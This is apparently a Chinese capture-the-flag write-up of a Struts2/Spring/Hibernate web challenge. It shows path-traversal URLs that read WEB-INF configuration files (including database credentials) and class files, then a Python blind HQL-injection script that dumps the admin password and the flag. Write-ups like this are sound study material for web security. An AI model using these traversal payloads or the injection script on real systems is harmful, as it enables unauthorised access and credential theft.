不会做,直接看wp
首先dirsearch可以查到一个list页面,访问后跳转至后台界面。
查看网页源代码,看到一堆css,其中有一段关键代码:
body{background:url(./loadimage?fileName=web_login_bg.jpg) no-repeat center;background-size: cover;}
可以看出来是任意文件下载漏洞,又因为抓包时看到
Cookie: JSESSIONID=E0DF23682D5579E82250E814AC694808
所以这是个java web网站,读取配置文件web.xml:
http://220.249.52.134:57839/loadimage?fileName=../../WEB-INF/web.xml
<?xml version="1.0" encoding="UTF-8"?><web-app id="WebApp_9" version="2.4"xmlns="http://java.sun.com/xml/ns/j2ee"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"><display-name>Struts Blank</display-name><filter><filter-name>struts2</filter-name><filter-class>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter</filter-class></filter><filter-mapping><filter-name>struts2</filter-name><url-pattern>/*</url-pattern></filter-mapping><welcome-file-list><welcome-file>/ctfpage/index.jsp</welcome-file></welcome-file-list><error-page><error-code>404</error-code><location>/ctfpage/404.html</location></error-page></web-app>
发现是struts2框架,所以接着继续读取struts2的配置文件:
http://220.249.52.134:57839/loadimage?fileName=../../WEB-INF/classes/struts.xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE struts PUBLIC"-//Apache Software Foundation//DTD Struts Configuration 2.3//EN""http://struts.apache.org/dtds/struts-2.3.dtd"><struts><constant name="strutsenableDynamicMethodInvocation" value="false"/><constant name="struts.mapper.alwaysSelectFullNamespace" value="true" /><constant name="struts.action.extension" value=","/><package name="front" namespace="/" extends="struts-default"><global-exception-mappings><exception-mapping exception="java.lang.Exception" result="error"/></global-exception-mappings><action name="zhuanxvlogin" class="com.cuitctf.action.UserLoginAction" method="execute"><result name="error">/ctfpage/login.jsp</result><result name="success">/ctfpage/welcome.jsp</result></action><action name="loadimage" class="com.cuitctf.action.DownloadAction"><result name="success" type="stream"><param name="contentType">image/jpeg</param><param name="contentDisposition">attachment;filename="bg.jpg"</param><param name="inputName">downloadFile</param></result><result name="suffix_error">/ctfpage/welcome.jsp</result></action></package><package name="back" namespace="/" extends="struts-default"><interceptors><interceptor name="oa" class="com.cuitctf.util.UserOAuth"/><interceptor-stack name="userAuth"><interceptor-ref name="defaultStack" /><interceptor-ref name="oa" /></interceptor-stack></interceptors><action name="list" class="com.cuitctf.action.AdminAction" method="execute"><interceptor-ref name="userAuth"><param name="excludeMethods">execute</param></interceptor-ref><result name="login_error">/ctfpage/login.jsp</result><result name="list_error">/ctfpage/welcome.jsp</result><result name="success">/ctfpage/welcome.jsp</result></action></package></struts>
可以看到有很多类,构造payload:
http://220.249.52.134:57839/loadimage?fileName=../../WEB-INF/classes/com/cuitctf/util/UserOAuth.class
就可以把文件下载下来,反编译之后可以看到代码,但是并没有什么用。
很多时候 , Struts , Spring , Hibernate 三大框架往往是一同使用的 , 因此被称为 “ SSH “ 三大框架 。所以接下来要读取Spring的配置文件:
http://220.249.52.134:57839/loadimage?fileName=../../WEB-INF/classes/applicationContext.xml
<?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"><bean id="dataSource" class="org.springframework.jdbc.datasource.DriverManagerDataSource"><property name="driverClassName"><value>com.mysql.jdbc.Driver</value></property><property name="url"><value>jdbc:mysql://localhost:3306/sctf</value></property><property name="username" value="root"/><property name="password" value="root" /></bean><bean id="sessionFactory" class="org.springframework.orm.hibernate3.LocalSessionFactoryBean"><property name="dataSource"><ref bean="dataSource"/></property><property name="mappingLocations"><value>user.hbm.xml</value></property><property name="hibernateProperties"><props><prop key="hibernate.dialect">org.hibernate.dialect.MySQLDialect</prop><prop key="hibernate.show_sql">true</prop></props></property></bean><bean id="hibernateTemplate" class="org.springframework.orm.hibernate3.HibernateTemplate"><property name="sessionFactory"><ref bean="sessionFactory"/></property></bean><bean id="transactionManager" class="org.springframework.orm.hibernate3.HibernateTransactionManager"><property name="sessionFactory"><ref bean="sessionFactory"/></property></bean><bean id="service" class="org.springframework.transaction.interceptor.TransactionProxyFactoryBean" abstract="true"><property name="transactionManager"><ref bean="transactionManager"/></property><property name="transactionAttributes"><props><prop key="add">PROPAGATION_REQUIRED</prop><prop key="find*">PROPAGATION_REQUIRED,readOnly</prop></props></property></bean><bean id="userDAO" class="com.cuitctf.dao.impl.UserDaoImpl"><property name="hibernateTemplate"><ref bean="hibernateTemplate"/></property></bean><bean id="userService" class="com.cuitctf.service.impl.UserServiceImpl"><property name="userDao"><ref bean="userDAO"/></property></bean></beans>
在这里就可以看到数据库的名称,用户名,密码。
并且程序通过com.cuitctf.dao.impl.UserDaoImpl类和com.cuitctf.service.impl.UserServiceImpl与数据库进行连接查询。接下来下载这两个即可
package com.cuitctf.dao.impl;import com.cuitctf.dao.UserDao;import com.cuitctf.po.User;import java.util.List;import org.springframework.orm.hibernate3.support.HibernateDaoSupport;public class UserDaoImpl extends HibernateDaoSupport implements UserDao {public List<User> findUserByName(String name) {return getHibernateTemplate().find("from User where name ='" + name + "'");}public List<User> loginCheck(String name, String password) {return getHibernateTemplate().find("from User where name ='" + name + "' and password = '" + password + "'");}}
package com.cuitctf.service.impl;import com.cuitctf.dao.UserDao;import com.cuitctf.po.User;import com.cuitctf.service.UserService;import java.util.List;import java.util.regex.Pattern;public class UserServiceImpl implements UserService {private UserDao userDao;public UserDao gerUserDao() {return this.userDao;}public void setUserDao(UserDao userDao2) {this.userDao = userDao2;}public List<User> findUserByName(String name) {return this.userDao.findUserByName(name);}public List<User> loginCheck(String name, String password) {String name2 = name.replaceAll(" ", "").replaceAll("=", "");Pattern.compile("^[0-9a-zA-Z]+$").matcher(name2);if (Pattern.compile("^[0-9a-zA-Z]+$").matcher(password).find()) {return this.userDao.loginCheck(name2, password);}return null;}}
通过脚本跑出来flag:
import requestsurl = "http://220.249.52.134:57839/zhuanxvlogin"# url = "http://localhost:9090/zhuanxvlogin"def first():admin_password = ""for i in range(1,9):for n in range(30,140):guess = chr(n)if guess == "_" or guess == "%":continueusername = "aaa'\nor\n(select\nsubstring(password,"+str(i)+",1)\nfrom\nUser\nwhere\nname\nlike\n'homamamama')\nlike\n'"+guess+"'\nor\n''like'"data = {"user.name": username, "user.password": "a"}req = requests.post(url, data=data, timeout=1000).textif len(req)>5000:admin_password = admin_password + guessprint "admin password: "+ admin_passwordbreakreturn admin_passworddef second(admin_password):flag = ""for i in range(1,50):for n in range(30,140):guess = chr(n)if guess == "_" or guess == "%":continueusername = "aa'\nor\n(select\nsubstring(welcometoourctf,"+str(i)+",1)\nfrom\nFlag)\nlike\n'"+guess+"'\nand\n''like'"data = {"user.name": username, "user.password": admin_password}req = requests.post(url, data=data, timeout=1000).textif len(req)>5000:flag = flag + guessprint "flag:" + flagbreakadmin_password = first()second(admin_password)
参考
若有收获,就点个赞吧
0 人点赞
